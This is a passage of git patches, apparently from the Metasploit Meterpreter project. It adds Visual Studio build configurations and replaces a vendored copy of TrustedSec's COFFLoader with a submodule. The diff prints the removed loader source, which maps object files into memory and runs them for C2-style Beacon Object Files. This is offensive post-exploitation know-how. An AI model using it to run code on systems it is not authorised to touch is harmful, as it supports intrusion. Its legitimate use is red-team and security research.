{2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|Win32.Build.0 = Debug|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|x64.ActiveCfg = Debug|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Debug|x64.Build.0 = Debug|x64 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|Win32.Build.0 = Release|Win32 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|x64.ActiveCfg = Release|x64 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.MinSizeRel|x64.Build.0 = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|Win32.ActiveCfg = r7_release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|Win32.Build.0 = r7_release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -258,10 +380,18 @@ Global {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|Win32.Build.0 = Release|Win32 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|x64.ActiveCfg = Release|x64 {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.Release|x64.Build.0 = Release|x64 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {2A4FDCA0-A620-4E98-AF05-2B2F227F5166}.RelWithDebInfo|x64.Build.0 = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|Win32.ActiveCfg = Debug|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|Win32.Build.0 = Debug|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|x64.ActiveCfg = Debug|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Debug|x64.Build.0 = Debug|x64 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|Win32.Build.0 = Release|Win32 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|x64.ActiveCfg = Release|x64 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.MinSizeRel|x64.Build.0 = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|Win32.ActiveCfg = r7_release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|Win32.Build.0 = r7_release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.r7_release|x64.ActiveCfg = r7_release|x64 @@ -270,10 +400,18 @@ Global {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|Win32.Build.0 = Release|Win32 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|x64.ActiveCfg = Release|x64 {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.Release|x64.Build.0 = Release|x64 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {561E26D9-7E79-4EF4-8AA2-A770F81568A7}.RelWithDebInfo|x64.Build.0 = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|Win32.ActiveCfg = Debug|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|Win32.Build.0 = Debug|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|x64.ActiveCfg = Debug|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Debug|x64.Build.0 = Debug|x64 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|Win32.ActiveCfg = Release|Win32 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|Win32.Build.0 = Release|Win32 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|x64.ActiveCfg = Release|x64 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.MinSizeRel|x64.Build.0 = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|Win32.ActiveCfg = Release|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|Win32.Build.0 = Release|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.r7_release|x64.ActiveCfg = Release|x64 @@ -282,6 +420,30 @@ Global {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|Win32.Build.0 = Release|Win32 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|x64.ActiveCfg = Release|x64 {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.Release|x64.Build.0 = Release|x64 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {E61592E1-28F4-4AFC-9EE1-9BE833A061C1}.RelWithDebInfo|x64.Build.0 = Release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|Win32.ActiveCfg = Debug|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|Win32.Build.0 = Debug|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|x64.ActiveCfg = Debug|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Debug|x64.Build.0 = Debug|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|Win32.ActiveCfg = Debug|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|Win32.Build.0 = Debug|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|x64.ActiveCfg = Debug|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.MinSizeRel|x64.Build.0 = Debug|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|Win32.ActiveCfg = r7_release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|Win32.Build.0 = r7_release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|x64.ActiveCfg = r7_release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.r7_release|x64.Build.0 = r7_release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|Win32.ActiveCfg = Release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|Win32.Build.0 = Release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|x64.ActiveCfg = Release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.Release|x64.Build.0 = Release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|Win32.ActiveCfg = Release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|Win32.Build.0 = Release|Win32 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|x64.ActiveCfg = Release|x64 + {486B160F-C571-486D-AAC3-CB60CEA7CBDD}.RelWithDebInfo|x64.Build.0 = Release|x64 EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE From cc6b6a1236e85892590f6a3a8b855036617da581 Mon Sep 17 00:00:00 2001 From: skylerknecht Date: Tue, 6 Sep 2022 23:59:44 -0400 Subject: [PATCH 08/17] Don't delete responses joe! --- c/meterpreter/source/extensions/bofloader/main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/c/meterpreter/source/extensions/bofloader/main.c b/c/meterpreter/source/extensions/bofloader/main.c index 9bc157e6..410a4210 100644 --- a/c/meterpreter/source/extensions/bofloader/main.c +++ b/c/meterpreter/source/extensions/bofloader/main.c @@ -46,7 +46,7 @@ DWORD request_exec_cmd(Remote *remote, Packet *packet) dprintf("[BOFLOADER] Inside request cmd\n"); if (NULL == response) { - met_api->packet.destroy(response); + // Don't delete the response! return ERROR_OUTOFMEMORY; } From d7005e679ebcf8031a6123314a3cdbcada5594d5 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 8 Sep 2022 15:56:56 -0400 Subject: [PATCH 09/17] Switch to using a submodule of TrustedSec/COFFLoader --- .gitmodules | 3 + .../source/extensions/bofloader/COFFLoader | 1 + .../.github/workflows/autorelease.yml | 61 -- .../bofloader/COFFLoader/.gitignore | 4 - .../bofloader/COFFLoader/COFFLoader.c | 628 ------------ .../bofloader/COFFLoader/COFFLoader.h | 135 --- .../bofloader/COFFLoader/LICENSE.txt | 25 - .../extensions/bofloader/COFFLoader/Makefile | 36 - .../extensions/bofloader/COFFLoader/README.md | 47 - .../extensions/bofloader/COFFLoader/beacon.h | 61 -- .../COFFLoader/beacon_compatibility.c | 355 ------- .../COFFLoader/beacon_compatibility.h | 66 -- .../bofloader/COFFLoader/beacon_generate.py | 96 -- .../extensions/bofloader/COFFLoader/dll.c | 30 - .../bofloader/COFFLoader/extension.json | 22 - .../extensions/bofloader/COFFLoader/test.c | 44 - .../source/extensions/bofloader/main.c | 54 +- .../ext_server_bofloader.vcxproj | 933 +++++++++--------- c/meterpreter/workspace/meterpreter.sln | 152 +-- 19 files changed, 521 insertions(+), 2232 deletions(-) create mode 160000 c/meterpreter/source/extensions/bofloader/COFFLoader delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.h delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/LICENSE.txt delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/Makefile delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/README.md delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon.h delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.c delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_compatibility.h delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/beacon_generate.py delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/dll.c delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/extension.json delete mode 100644 c/meterpreter/source/extensions/bofloader/COFFLoader/test.c diff --git a/.gitmodules b/.gitmodules index aa1a4a30..68c4a63e 100644 --- a/.gitmodules +++ b/.gitmodules @@ -7,3 +7,6 @@ [submodule "c/meterpreter/source/extensions/kiwi/mimikatz"] path = c/meterpreter/source/extensions/kiwi/mimikatz url = https://github.com/rapid7/mimikatz +[submodule "c/meterpreter/source/extensions/bofloader/COFFLoader"] + path = c/meterpreter/source/extensions/bofloader/COFFLoader + url = https://github.com/TrustedSec/COFFLoader diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader b/c/meterpreter/source/extensions/bofloader/COFFLoader new file mode 160000 index 00000000..d69bc130 --- /dev/null +++ b/c/meterpreter/source/extensions/bofloader/COFFLoader @@ -0,0 +1 @@ +Subproject commit d69bc130ccdd6229b90307b0cef05f255587323b diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml b/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml deleted file mode 100644 index 86ab034f..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/.github/workflows/autorelease.yml +++ /dev/null @@ -1,61 +0,0 @@ -name: Release - -on: - push: - tags: ["v[1-9]+.[0-9]+.[0-9]+"] - branches: [main] - -jobs: - dll-build: - name: Build the DLL - if: startsWith( github.ref, 'refs/tags/v') - runs-on: ubuntu-latest - timeout-minutes: 10 - steps: - - name: OS Packages - run: | - sudo apt-get update --fix-missing && sudo apt-get -y install \ - git build-essential zlib1g zlib1g-dev wget zip unzip \ - mingw-w64 binutils-mingw-w64 g++-mingw-w64 gcc-multilib jq - - - name: Minisign - run: | - MINISIGN_TMP=`mktemp -d` - cd $MINISIGN_TMP - wget https://github.com/aead/minisign/releases/download/v0.2.0/minisign-linux-amd64.tar.gz - tar xvf minisign-linux-amd64.tar.gz - mv ./minisign ~/minisign - - - name: Check out code - uses: actions/checkout@v2 - - - name: Git Fetch Tags - run: git fetch --prune --unshallow --tags -f - - - name: Build artifacts - run: | - make clean - make all-dll - mkdir artifacts - VERSION=$(git describe --tags --abbrev=0) - cat extension.json | jq ".version |= \"$VERSION\"" > ./artifacts/extension.json - cp LICENSE.txt ./artifacts/LICENSE - mv *.dll ./artifacts/ - cd artifacts - tar -czvf ../coff-loader.tar.gz . - - - name: Sign Package - run: | - touch ~/minisign.key && chmod 600 ~/minisign.key - echo -e "${{ secrets.MINISIGN_PRIVATE_KEY }}" > ~/minisign.key - MANIFEST=$(cat ./artifacts/extension.json | base64 -w 0) - bash -c "echo \"\" | ~/minisign -s ~/minisign.key -S -m ./coff-loader.tar.gz -t \"$MANIFEST\" -x coff-loader.minisig" - - - name: "Publish Release" - uses: "marvinpinto/action-automatic-releases@latest" - with: - repo_token: "${{ secrets.GITHUB_TOKEN }}" - prerelease: false - files: | - ./coff-loader.tar.gz - ./coff-loader.minisig diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore b/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore deleted file mode 100644 index 3c3c7474..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/.gitignore +++ /dev/null @@ -1,4 +0,0 @@ -*.exe -*.out -*.dll -.vscode \ No newline at end of file diff --git a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c b/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c deleted file mode 100644 index c039027d..00000000 --- a/c/meterpreter/source/extensions/bofloader/COFFLoader/COFFLoader.c +++ /dev/null @@ -1,628 +0,0 @@ -/* - * COFF Loader Project - * ------------------- - * This is a re-implementation of a COFF loader, with a BOF compatibility layer - * it's meant to provide functional example of loading a COFF file in memory - * and maybe be useful. - */ -#include -#include -#include -#include - -#if defined(_WIN32) -#include -#include "beacon_compatibility.h" -#endif - -#include "COFFLoader.h" -/* Enable or disable debug output if testing or adding new relocation types */ -#ifdef DEBUG -#define DEBUG_PRINT(x, ...) printf(x, ##__VA_ARGS__) -#else -#define DEBUG_PRINT(x, ...) -#endif - -/* Defining symbols for the OS version, will try to define anything that is - * different between the arch versions by specifying them here. */ -#if defined(__x86_64__) || defined(_WIN64) -#define PREPENDSYMBOLVALUE "__imp_" -#else -#define PREPENDSYMBOLVALUE "__imp__" -#endif - -unsigned char *unhexlify(unsigned char *value, int *outlen) -{ - unsigned char *retval = NULL; - char byteval[3] = {0}; - int counter = 0; - int counter2 = 0; - char character = 0; - if (value == NULL) - { - return NULL; - } - DEBUG_PRINT("Unhexlify Strlen: %lu\n", (long unsigned int)strlen((char *)value)); - if (value == NULL || strlen((char *)value) % 2 != 0) - { - DEBUG_PRINT("Either value is NULL, or the hexlified string isn't valid\n"); - goto errcase; - } - - retval = calloc(strlen((char *)value) + 1, 1); - if (retval == NULL) - { - goto errcase; - } - - counter2 = 0; - #pragma warning(push) - #pragma warning(disable:4018) - #pragma warning(disable:4244) - for (counter = 0; counter < strlen((char *)value); counter += 2) - { - memcpy(byteval, value + counter, 2); - character = strtol(byteval, NULL, 16); - memcpy(retval + counter2, &character, 1); - counter2++; - } - *outlen = counter2; - #pragma warning(pop) -errcase: - return retval; -} - - - -/* Helper to just get the contents of a file, used for testing. Real - * implementations of this in an agent would use the tasking from the - * C2 server for this */ -unsigned char *getContents(char *filepath, uint32_t *outsize) -{ - FILE *fin = NULL; - uint32_t fsize = 0; - uint32_t readsize = 0; - unsigned char *buffer = NULL; - unsigned char *tempbuffer = NULL; - - fin = fopen(filepath, "rb"); - if (fin == NULL) - { - return NULL; - } - fseek(fin, 0, SEEK_END); - fsize = ftell(fin); - fseek(fin, 0, SEEK_SET); - tempbuffer = calloc(fsize, 1); - if (tempbuffer == NULL) - { - return NULL; - } - memset(tempbuffer, 0, fsize); - #pragma warning(push) - #pragma warning(disable:4267) - readsize = fread(tempbuffer, 1, fsize, fin); - #pragma warning(pop) - - fclose(fin); - buffer = calloc(readsize, 1); - if (buffer == NULL) - { - return NULL; - } - memset(buffer, 0, readsize); - memcpy(buffer, tempbuffer, readsize - 1); - free(tempbuffer); - *outsize = fsize; - return buffer; -} - -/* Helper function to process a symbol string, determine what function and - * library its from, and return the right function pointer. Will need to - * implement in the loading of the beacon internal functions, or any other - * internal functions you want to have available. */ -void *process_symbol(char *symbolstring) -{ - void *functionaddress = NULL; - char localcopy[1024] = {0}; - char *locallib = NULL; - char *localfunc = NULL; -#if defined(_WIN32) - int tempcounter = 0; - HMODULE llHandle = NULL; -#endif - - memcpy(localcopy, symbolstring, strlen(symbolstring)); - if (strncmp(symbolstring, PREPENDSYMBOLVALUE "Beacon", strlen(PREPENDSYMBOLVALUE "Beacon")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "toWideChar", strlen(PREPENDSYMBOLVALUE "toWideChar")) == 0 || - strncmp(symbolstring, PREPENDSYMBOLVALUE "GetProcAddress", strlen(PREPENDSYMBOLVALUE "GetProcAddress")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "LoadLibraryA", strlen(PREPENDSYMBOLVALUE "LoadLibraryA")) == 0 || - strncmp(symbolstring, PREPENDSYMBOLVALUE "GetModuleHandleA", strlen(PREPENDSYMBOLVALUE "GetModuleHandleA")) == 0 || strncmp(symbolstring, PREPENDSYMBOLVALUE "FreeLibrary", strlen(PREPENDSYMBOLVALUE "FreeLibrary")) == 0) - { - localfunc = symbolstring + strlen(PREPENDSYMBOLVALUE); - DEBUG_PRINT("\t\tInternalFunction: %s\n", localfunc); - /* TODO: Get internal symbol here and set to functionaddress, then - * return the pointer to the internal function*/ -#if defined(_WIN32) - for (tempcounter = 0; tempcounter < 29; tempcounter++) - { - if (InternalFunctions[tempcounter][0] != NULL) - { - if (strcmp(localfunc, (char *)(InternalFunctions[tempcounter][0])) == 0) - { - functionaddress = (void *)InternalFunctions[tempcounter][1]; - return functionaddress; - } - } - } -#endif - } - else if (strncmp(symbolstring, PREPENDSYMBOLVALUE, strlen(PREPENDSYMBOLVALUE)) == 0) - { - DEBUG_PRINT("\t\tYep its an external symbol\n"); - locallib = localcopy + strlen(PREPENDSYMBOLVALUE); - - locallib = strtok(locallib, "$"); - localfunc = strtok(NULL, "$"); - DEBUG_PRINT("\t\tLibrary: %s\n", locallib); - localfunc = strtok(localfunc, "@"); - DEBUG_PRINT("\t\tFunction: %s\n", localfunc); - /* Resolve the symbols here, and set the functionpointervalue */ -#if defined(_WIN32) - llHandle = LoadLibraryA(locallib); - DEBUG_PRINT("\t\tHandle: 0x%lx\n", llHandle); - functionaddress = GetProcAddress(llHandle, localfunc); - DEBUG_PRINT("\t\tProcAddress: 0x%p\n", functionaddress); -#endif - } - return functionaddress; -} - -int LoadAndRun(char *argsBuffer, uint32_t bufferSize, goCallback callback) -{ -#if defined(_WIN32) - // argsBuffer: functionname |coff_data | args_data - datap parser; - char *functionName; - unsigned char *coff_data = NULL; - unsigned char *arguments_data = NULL; - int filesize = 0; - int arguments_size = 0; - - BeaconDataParse(&parser, argsBuffer, bufferSize); - functionName = BeaconDataExtract(&parser, NULL); - if (functionName == NULL) - { - return 1; - } - coff_data = (unsigned char *)BeaconDataExtract(&parser, &filesize); - if (coff_data == NULL) - { - return 1; - } - arguments_data = (unsigned char *)BeaconDataExtract(&parser, &arguments_size); - if (arguments_data == NULL) - { - return 1; - } - - return RunCOFF(functionName, coff_data, filesize, arguments_data, arguments_size, callback); -#else - return 0; -#endif -} -// #endif -/* Just a generic runner for testing, this is pretty much just a reference - * implementation, return values will need to be checked, more relocation - * types need to be handled, and needs to have different arguments for use - * in any agent. */ -int RunCOFF(char *functionname, unsigned char *coff_data, uint32_t filesize, unsigned char *argumentdata, int argumentSize, goCallback callback) -{ - coff_file_header_t *coff_header_ptr = NULL; - coff_sect_t *coff_sect_ptr = NULL; - coff_reloc_t *coff_reloc_ptr = NULL; - coff_sym_t *coff_sym_ptr = NULL; - char *outdata = NULL; - int outdataSize = 0; - int retcode = 0; - int counter = 0; - int reloccount = 0; - int tempcounter = 0; - uint32_t symptr = 0; - long unsigned int old_prot = 0; - uint32_t protect = 0; - uint32_t protect_index = 0; -#ifdef _WIN32 - void *funcptrlocation = NULL; - int32_t offsetvalue = 0; -#endif - char *entryfuncname = functionname; -#if defined(__x86_64__) || defined(_WIN64) -#ifdef _WIN32 - uint64_t longoffsetvalue = 0; -#endif -#else - /* Set the input function name to match the 32 bit version */ - entryfuncname = calloc(strlen(functionname) + 2, 1); - if (entryfuncname == NULL) - { - return 1; - } - (void)sprintf(entryfuncname, "_%s", functionname); -#endif - -#ifdef _WIN32 - /* NOTE: I just picked a size, look to see what is max/normal. */ - char *sectionMapping[25] = {0}; -#ifdef DEBUG - int sectionSize[25] = {0}; -#endif - void (*foo)(char *in, unsigned long datalen); - char *functionMapping = NULL; - int functionMappingCount = 0; -#endif - - if (coff_data == NULL) - { - DEBUG_PRINT("Can't execute NULL\n"); - return 1; - } - coff_header_ptr = (coff_file_header_t *)coff_data; - DEBUG_PRINT("Machine 0x%X\n", coff_header_ptr->Machine); - DEBUG_PRINT("Number of sections: %d\n", coff_header_ptr->NumberOfSections); - DEBUG_PRINT("TimeDateStamp : %X\n", coff_header_ptr->TimeDateStamp); - DEBUG_PRINT("PointerToSymbolTable : 0x%X\n", coff_header_ptr->PointerToSymbolTable); - DEBUG_PRINT("NumberOfSymbols: %d\n", coff_header_ptr->NumberOfSymbols); - DEBUG_PRINT("OptionalHeaderSize: %d\n", coff_header_ptr->SizeOfOptionalHeader); - DEBUG_PRINT("Characteristics: %d\n", coff_header_ptr->Characteristics); - DEBUG_PRINT("\n"); - coff_sym_ptr = (coff_sym_t *)(coff_data + coff_header_ptr->PointerToSymbolTable); - - /* Handle the allocation and copying of the sections we're going to use - * for right now I'm just VirtualAlloc'ing memory, this can be changed to - * other methods, but leaving that up to the person implementing it. */ - for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) - { - coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); - DEBUG_PRINT("Name: %s\n", coff_sect_ptr->Name); - DEBUG_PRINT("VirtualSize: 0x%X\n", coff_sect_ptr->VirtualSize); - DEBUG_PRINT("VirtualAddress: 0x%X\n", coff_sect_ptr->VirtualAddress); - DEBUG_PRINT("SizeOfRawData: 0x%X\n", coff_sect_ptr->SizeOfRawData); - DEBUG_PRINT("PointerToRelocations: 0x%X\n", coff_sect_ptr->PointerToRelocations); - DEBUG_PRINT("PointerToRawData: 0x%X\n", coff_sect_ptr->PointerToRawData); - DEBUG_PRINT("NumberOfRelocations: %d\n", coff_sect_ptr->NumberOfRelocations); - /* NOTE: When changing the memory loading information of the loader, - * you'll want to use this field and the defines from the Section - * Flags table of Microsofts page, some defined in COFFLoader.h */ - DEBUG_PRINT("Characteristics: %x\n", coff_sect_ptr->Characteristics); -#ifdef _WIN32 - DEBUG_PRINT("Allocating 0x%x bytes\n", coff_sect_ptr->VirtualSize); - /* NOTE: Might want to allocate as PAGE_READWRITE and VirtualProtect - * before execution to either PAGE_READWRITE or PAGE_EXECUTE_READ - * depending on the Section Characteristics. Parse them all again - * before running and set the memory permissions. */ - sectionMapping[counter] = VirtualAlloc(NULL, coff_sect_ptr->SizeOfRawData, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); -#ifdef DEBUG - sectionSize[counter] = coff_sect_ptr->SizeOfRawData; -#endif - if (sectionMapping[counter] == NULL) - { - DEBUG_PRINT("Failed to allocate memory\n"); - } - DEBUG_PRINT("Allocated section %d at %p\n", counter, sectionMapping[counter]); - memcpy(sectionMapping[counter], coff_data + coff_sect_ptr->PointerToRawData, coff_sect_ptr->SizeOfRawData); - -#endif - } - - /* Allocate and setup the GOT for functions, same here as above. */ -#ifdef _WIN32 -#ifdef _WIN64 - functionMapping = VirtualAlloc(NULL, 2048, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); -#else - functionMapping = VirtualAlloc(NULL, 2048, MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, PAGE_READWRITE); -#endif -#endif - #pragma warning(push) - #pragma warning(disable:4244) - - /* Start parsing the relocations, and *hopefully* handle them correctly. */ - for (counter = 0; counter < coff_header_ptr->NumberOfSections; counter++) - { - DEBUG_PRINT("Doing Relocations of section: %d\n", counter); - coff_sect_ptr = (coff_sect_t *)(coff_data + sizeof(coff_file_header_t) + (sizeof(coff_sect_t) * counter)); - coff_reloc_ptr = (coff_reloc_t *)(coff_data + coff_sect_ptr->PointerToRelocations); - for (reloccount = 0; reloccount < coff_sect_ptr->NumberOfRelocations; reloccount++) - { - DEBUG_PRINT("\tVirtualAddress: 0x%X\n", coff_reloc_ptr->VirtualAddress); - DEBUG_PRINT("\tSymbolTableIndex: 0x%X\n", coff_reloc_ptr->SymbolTableIndex); - DEBUG_PRINT("\tType: 0x%X\n", coff_reloc_ptr->Type); - if (coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.Name[0] != 0) - { - symptr = coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.value[1]; - DEBUG_PRINT("\tSymPtr: 0x%X\n", symptr); - DEBUG_PRINT("\tSymName: %s\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].first.Name); - DEBUG_PRINT("\tSectionNumber: 0x%X\n", coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber); - - /* This is the code for relative offsets in other sections of the COFF file. */ -#ifdef _WIN32 -#ifdef _WIN64 - /* Type == 1 relocation is the 64-bit VA of the relocation target */ - if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_ADDR64) - { - memcpy(&longoffsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(uint64_t)); - DEBUG_PRINT("\tReadin longOffsetValue : 0x%llX\n", longoffsetvalue); - longoffsetvalue = (uint64_t)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + (uint64_t)longoffsetvalue); - DEBUG_PRINT("\tModified longOffsetValue : 0x%llX Base Address: %p\n", longoffsetvalue, sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1]); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &longoffsetvalue, sizeof(uint64_t)); - } - /* This is Type == 3 relocation code */ - else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_ADDR32NB) - { - memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); - DEBUG_PRINT("\tReadin OffsetValue : 0x%0X\n", offsetvalue); - DEBUG_PRINT("\t\tReferenced Section: 0x%X\n", sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue); - DEBUG_PRINT("\t\tEnd of Relocation Bytes: 0x%X\n", sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4); - if (((char *)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue) - (char *)(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) - { - DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); - retcode = 1; - goto cleanup; - } - offsetvalue = ((char *)(sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] + offsetvalue) - (char *)(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)); - DEBUG_PRINT("\tOffsetValue : 0x%0X\n", offsetvalue); - DEBUG_PRINT("\t\tSetting 0x%X to %X\n", sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue); - memcpy(sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, &offsetvalue, sizeof(uint32_t)); - } - /* This is Type == 4 relocation code, needed to make global variables to work correctly */ - else if (coff_reloc_ptr->Type == IMAGE_REL_AMD64_REL32) - { - memcpy(&offsetvalue, sectionMapping[counter] + coff_reloc_ptr->VirtualAddress, sizeof(int32_t)); - DEBUG_PRINT("\t\tReadin offset value: 0x%X\n", offsetvalue); - if ((sectionMapping[coff_sym_ptr[coff_reloc_ptr->SymbolTableIndex].SectionNumber - 1] - (sectionMapping[counter] + coff_reloc_ptr->VirtualAddress + 4)) > 0xffffffff) - { - DEBUG_PRINT("Relocations > 4 gigs away, exiting\n"); - retcode = 1; - goto cleanup; - } 